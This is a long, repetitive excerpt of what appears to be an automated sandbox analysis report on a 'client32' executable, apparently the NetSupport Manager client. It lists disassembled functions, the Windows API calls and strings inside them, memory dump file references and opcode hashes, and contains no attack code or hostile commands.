                                                                                                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,?,?), ref: 110ED2DB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValuewvsprintf
                                                                                                                                                                                • String ID: ($Error %d getting %s
                                                                                                                                                                                • API String ID: 141982866-3697087921
                                                                                                                                                                                • Opcode ID: 3bd21d707a9b839315ca8969c70946965b81d1e448144c9137b6ca9f4cef76ca
                                                                                                                                                                                • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                                                                                                                • Opcode Fuzzy Hash: 3bd21d707a9b839315ca8969c70946965b81d1e448144c9137b6ca9f4cef76ca
                                                                                                                                                                                • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                                                                                                                Function 1112B4A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersionExA.KERNEL32(?,?), ref: 1112B4C7
                                                                                                                                                                                  • Part of subcall function 1112A8F0: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 1112A915
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProcVersion
                                                                                                                                                                                • String ID: ..\CTL32\tasklist.cpp$FALSE
                                                                                                                                                                                • API String ID: 2540053943-3916168320
                                                                                                                                                                                • Opcode ID: 94c3bd572ee4bb1795427fa141fd0d25871e554c4e3eac0d4e53ae5ed89903f3
                                                                                                                                                                                • Instruction ID: 3f8f23924fb6816d2583dbc53434956826c13dab1dcb54e0a4451564bb9dfc25
                                                                                                                                                                                • Opcode Fuzzy Hash: 94c3bd572ee4bb1795427fa141fd0d25871e554c4e3eac0d4e53ae5ed89903f3
                                                                                                                                                                                • Instruction Fuzzy Hash: 25018431A0012D5BCB24DFB8A951BEDF3A8EB4521DF9001EAD80ADB641EF615A54C7C5
                                                                                                                                                                                Function 1100B690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                                                                                                                                • Error. NULL capbuf, xrefs: 1100B6A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                                                                                                                • API String ID: 0-3856134272
                                                                                                                                                                                • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                                                                                                                • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                                                                                                                                • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                                                                                                                • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                                                                                                                                Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wvsprintfA.USER32(?,11195264,?), ref: 110D1572
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                • API String ID: 175691280-2052047905
                                                                                                                                                                                • Opcode ID: ad90579ad5e064bbf77329d7ac8f12928e9bffb1662942292faf95f013f94dc6
                                                                                                                                                                                • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                                                                                                                • Opcode Fuzzy Hash: ad90579ad5e064bbf77329d7ac8f12928e9bffb1662942292faf95f013f94dc6
                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                                                                                                                Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 11015049
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                                                • API String ID: 819365019-3966830984
                                                                                                                                                                                • Opcode ID: e914ed5dd69e6b17a7050c9bde4cd8a07eed9894da78e4b5e3510086f190f171
                                                                                                                                                                                • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                                                                                                                • Opcode Fuzzy Hash: e914ed5dd69e6b17a7050c9bde4cd8a07eed9894da78e4b5e3510086f190f171
                                                                                                                                                                                • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                                                                                                                Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                • API String ID: 175691280-2052047905
                                                                                                                                                                                • Opcode ID: 80ce01e29f7ccbea5f207e48e6a77ddd7c344a7ab8d2ad630caf9b33ab9a9043
                                                                                                                                                                                • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                                                                                                                • Opcode Fuzzy Hash: 80ce01e29f7ccbea5f207e48e6a77ddd7c344a7ab8d2ad630caf9b33ab9a9043
                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                                                                                                                Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                                                                                                                • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                                                                                                                • API String ID: 1134434899-3115850912
                                                                                                                                                                                • Opcode ID: 24c7f76132064fc7ff839198c1a90d07c619a74f2dcb1a4b684f280d5c11809d
                                                                                                                                                                                • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                                                                                                                • Opcode Fuzzy Hash: 24c7f76132064fc7ff839198c1a90d07c619a74f2dcb1a4b684f280d5c11809d
                                                                                                                                                                                • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                                                                                                                Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 110151F9
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                                                • API String ID: 819365019-3966830984
                                                                                                                                                                                • Opcode ID: 8cdffa3b5c977e2509e8ead444af02450bb4f663d8a4c9684a4d94db93e2ebeb
                                                                                                                                                                                • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 8cdffa3b5c977e2509e8ead444af02450bb4f663d8a4c9684a4d94db93e2ebeb
                                                                                                                                                                                • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                                                                                                                Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                • String ID: QueueUserWorkItem
                                                                                                                                                                                • API String ID: 199729137-2469634949
                                                                                                                                                                                • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                                                                                • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                                                                                • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                                                                                                                Function 111793D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __umatherr.LIBCMT ref: 11179402
                                                                                                                                                                                  • Part of subcall function 11179336: __ctrlfp.LIBCMT ref: 1117938E
                                                                                                                                                                                • __ctrlfp.LIBCMT ref: 1117941F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
